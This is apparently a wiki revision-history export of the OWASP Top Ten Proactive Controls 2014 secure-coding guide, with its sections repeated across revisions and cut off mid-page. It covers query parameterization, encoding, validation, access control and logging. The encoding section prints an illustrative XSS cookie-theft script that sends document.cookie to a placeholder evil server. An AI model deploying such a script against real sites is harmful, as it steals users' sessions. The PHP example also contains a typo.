Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
To make correlation and analysis easier, follow a common logging approach within the system and across systems where possible, using an extensible logging framework like SLF4J with Logback or Apache Log4j2, to ensure that all log entries are consistent.<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little. Make sure to always log the time stamp and identifying information like the source IP and user-id, but be careful not to log private or confidential data or opt-out data or secrets. Use knowledge of the intended purposes to guide what, when and how much to log. To protect from Log Injection aka [http://www.owasp.org/index.php/Log_Forging Log Forging], make sure to perform encoding on untrusted data before logging it.<br />
<br />
The [[OWASP AppSensor Project]] explains how to implement intrusion detection and automated response into an existing application: where to add sensors or [https://www.owasp.org/index.php/AppSensor_DetectionPoints detection points] and what [http://www.owasp.org/index.php/AppSensor_ResponseActions response actions] to take when a security exception is encountered in your application.<br />
<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
* [[Business Logic Security Cheat Sheet]]<br />
* [[Testing for business logic (OWASP-BL-001)]]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of July: Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176699OWASP Proactive Controls2014-06-09T20:26:53Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the complete document in the tab to the right.<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include Unix encoding, Windows encoding, LDAP encoding, XML encoding and others. OWASP's Enterprise Security API (ESAPI) provides encoders for these functions in Java. In .NET 4.5, the [http://msdn.microsoft.com/en-us/library/system.web.security.antixss.antixssencoder%28v=vs.110%29.aspx AntiXssEncoder Class] provides CSS, HTML, URL, JavaScriptString and XML encoders - other encoders for LDAP and VBScript are included in the open source AntiXSS library.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API OWASP ESAPI]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
* [http://commons.apache.org/proper/commons-validator/ Apache Commons Validator]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature or resource should be granted or denied. It should be noted that authorization is not equivalent to authentication (verifying identity). These terms and their definitions are frequently confused. <br />
<br />
Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a user's role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verifying that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issues in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
* [https://code.google.com/p/keyczar/ Google KeyCzar]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Make sure that confidential or sensitive data is not exposed by accident during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
The [[OWASP AppSensor Project]] is a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application: where to add sensors or [https://www.owasp.org/index.php/AppSensor_DetectionPoints detection points] and what [https://www.owasp.org/index.php/AppSensor_ResponseActions response actions] to take when an exception is encountered in your application.<br />
<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
* [[Business Logic Security Cheat Sheet]]<br />
* [[Testing for business logic (OWASP-BL-001)]]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of July: Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176683OWASP Proactive Controls2014-06-09T16:16:54Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
